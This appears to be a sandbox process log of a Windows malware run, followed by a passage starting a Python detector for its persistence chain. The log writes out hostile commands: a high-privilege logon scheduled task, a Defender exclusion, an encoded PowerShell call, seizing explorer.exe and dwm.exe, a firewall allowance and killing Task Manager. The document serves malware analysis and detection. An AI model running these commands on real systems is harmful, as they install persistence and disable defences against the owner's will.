"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
C:\Windows\SysWOW64\PING.EXE
ping google.com -t -n 1 -s 4 -4
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5552 /prefetch:8
C:\Windows\SysWOW64\cipher.exe
cipher /e
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5552 /prefetch:8
C:\Windows\SysWOW64\cipher.exe
cipher /e
C:\Windows\SysWOW64\cipher.exe
cipher /e
C:\Windows\SysWOW64\PING.EXE
ping mrbeast.codes -t -n 1 -s 4 -4
C:\Windows\SysWOW64\xcopy.exe
xcopy Google.exe C:\Users\Admin\Desktop
C:\Windows\SysWOW64\xcopy.exe
xcopy Rover.exe C:\Users\Admin\Desktop
C:\Windows\SysWOW64\xcopy.exe
xcopy spinner.gif C:\Users\Admin\Desktop
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K bloatware.cmd
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\regmess.exe
regmess.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\1.exe
1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\regmess_091a4519-6c19-48cd-b05f-a90fb69c0301\regmess.bat" "
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe
3.exe
C:\Windows\SysWOW64\reg.exe
reg import Setup.reg /reg:32
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\reg.exe
reg import Console.reg /reg:32
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K SilentSetup.cmd
C:\Windows\SysWOW64\reg.exe
reg import Desktop.reg /reg:32
C:\Windows\SysWOW64\reg.exe
reg import International.reg /reg:32
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe
WinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$10396,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT
C:\Windows\SysWOW64\reg.exe
reg import Fonts.reg /reg:32
C:\Windows\SysWOW64\reg.exe
reg import Cursors.reg /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5736 -ip 5736
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1784
C:\Windows\SysWOW64\taskkill.exe
taskkill /im winaerotweaker.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im winaerotweakerhelper.exe /f
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\0378038449fa4d9682e5b8e5c711d22a /t 6204 /p 6200
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\scary.exe
scary.exe
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\the.exe
the.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\wimloader.dll
wimloader.dll
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_582d51cd-8c29-4269-841f-5d7e9d03a993\caller.cmd" "
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hTlYQIUO0h1A.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -EncodedCommand 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
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\ac3.exe
ac3.exe
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\shell1.ps1"
C:\Windows\SysWOW64\PING.EXE
ping trustsentry.com -t -n 1 -s 4 -4
C:\Windows\SysWOW64\PING.EXE
ping ya.ru -t -n 1 -s 4 -4
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EZQihT05n9bv.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\PING.EXE
ping tria.ge -t -n 1 -s 4 -4
C:\Windows\SysWOW64\xcopy.exe
xcopy bloatware C:\Users\Admin\Desktop
C:\Windows\SysWOW64\xcopy.exe
xcopy beastify.url C:\Users\Admin\Desktop
C:\Windows\SysWOW64\xcopy.exe
xcopy shell1.ps1 C:\Users\Admin\Desktop
C:\Windows\SysWOW64\takeown.exe
takeown /R /F C:\Windows\explorer.exe
C:\Windows\SysWOW64\icacls.exe
icacls c:\Windows\explorer.exe /grant Admin:(F)
C:\Windows\SysWOW64\takeown.exe
takeown /R /F C:\Windows\System32\dwm.exe
C:\Windows\SysWOW64\icacls.exe
icacls c:\Windows\System32\dwm.exe /grant Admin:(F)
C:\Windows\SysWOW64\xcopy.exe
xcopy xcer.cer C:\Users\Admin\Desktop
C:\Windows\SysWOW64\timeout.exe
timeout /t 15
C:\Windows\SysWOW64\timeout.exe
timeout /t 15
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\the.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\freebobux.exe
freebobux.exe
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\SolaraBootstraper.exe
SolaraBootstraper.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im ctfmon.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\wim.dll
wim.dll
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3DF9.tmp\freebobux.bat""
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wim_74b2ead3-07c5-459f-a40d-b1a98d31497f\load.cmd" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HncuP1qJTS5v.bat" "
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe
"C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\AppData\Local\Temp\3DF9.tmp\CLWCP.exe
clwcp c:\temp\bg.bmp
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_74b2ead3-07c5-459f-a40d-b1a98d31497f\cringe.mp4"
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_74b2ead3-07c5-459f-a40d-b1a98d31497f\lol.ini
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\web2.htm
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1856 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\xcer.cer
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3DF9.tmp\x.vbs"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LWt94Dub5LFs.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rZmMfjD5k7eK.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe
f3cb220f1aaa32ca310586e5f62dcab1.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 15
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x78,0x108,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1496,14909979360840004400,3372282537268262913,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,839320844312324912,4757314447254224790,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NnbGeaeUTLT0.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6056 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6056 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pjCRu77GHrjM.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\xcopy.exe
xcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop
C:\Windows\SysWOW64\regedit.exe
regedit
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0Wc443H7jsH8.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
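The chain above (Romilyaa.exe creates a logon task named "Windows 10 Boot" with /rl HIGHEST pointing back at itself, then runs a batch file from %TEMP% that uses `ping -n 10 localhost` as a sleep before relaunching) is the restart/persistence routine the summary tags as "Uses Task Scheduler COM API" and "Delays execution with timeout.exe"-style delaying. The following is an added example, not part of the Triage report or of the malware: it parses a process list in the report's own two-line format (image path, then command line) and flags the three tell-tale commands. The sample input is the Romilyaa.exe chain copied from above; the rule names, the three-ping threshold and the Temp-path pattern are this example's assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample: the Romilyaa.exe chain copied from the process list above.
# Each process is a path line followed by its command line.
SAMPLE_PROCESS_LIST = r'''
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
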